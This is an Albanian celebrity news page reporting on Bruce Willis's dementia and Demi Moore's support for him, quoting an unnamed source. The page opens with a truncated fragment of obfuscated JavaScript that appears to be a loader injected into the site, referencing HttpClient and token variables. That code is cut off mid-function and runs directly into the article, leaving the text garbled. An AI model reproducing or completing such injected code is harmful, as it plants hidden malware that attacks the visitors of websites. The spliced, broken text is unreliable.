;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çfarë po ndodh me shëndetin e Bruce Willis? Demi Moore jep detaje

By

Kanë kaluar shumë muaj që kur u publikua lajmi se aktori Bruce Willis ishte diagnostikuar me demencë frontotemporale, e cila gradualisht po e shuan jetën e yllit të filmave.

Willis, i cili në vitet ’80, ’90 dhe në dekadën e parë të shekullit të 21 ishte një nga aktorët kryesorë në filmat aksion, ka qenë i mbyllur në shtëpinë e tij për më shumë se dy vjet nën kujdesin e familjes së tij, të cilët nuk e kanë lënë për një moment në këto kohë të vështira.

Në fakt, gjendja shëndetësore e aktorit është publike falë përditësimeve të ndara nga gruaja dhe fëmijët e tij në rrjetet sociale, por edhe nga aktorja Demi Moore, e cila edhe pse është divorcuar nga Willis për më shumë se tre dekada, vazhdon të ofrojë mbështetje për të.

Ata kishin tre vajza dhe kishin 13 vite martesë.

“Ajo ndihet jashtëzakonisht mirënjohëse dhe emocionale. Ajo ka kaluar jetën e saj me të dhe është mirënjohëse për të gjitha gjërat që kanë kaluar”, tha burimi.

Aktorja beson se kjo situatë e ka mësuar se si të bëhet “luftëtare”.

“Të shohësh atë duke kaluar nëpër betejat e tij i ka treguar Demit se si të jetë një luftëtare. Është kaq e hidhur, por edhe frymëzuese,” tha burimi.

“Ajo e admiron kaq shumë Brucen dhe po përgatit veten për lamtumirë emocionale”.

Artikuj të ngjashëm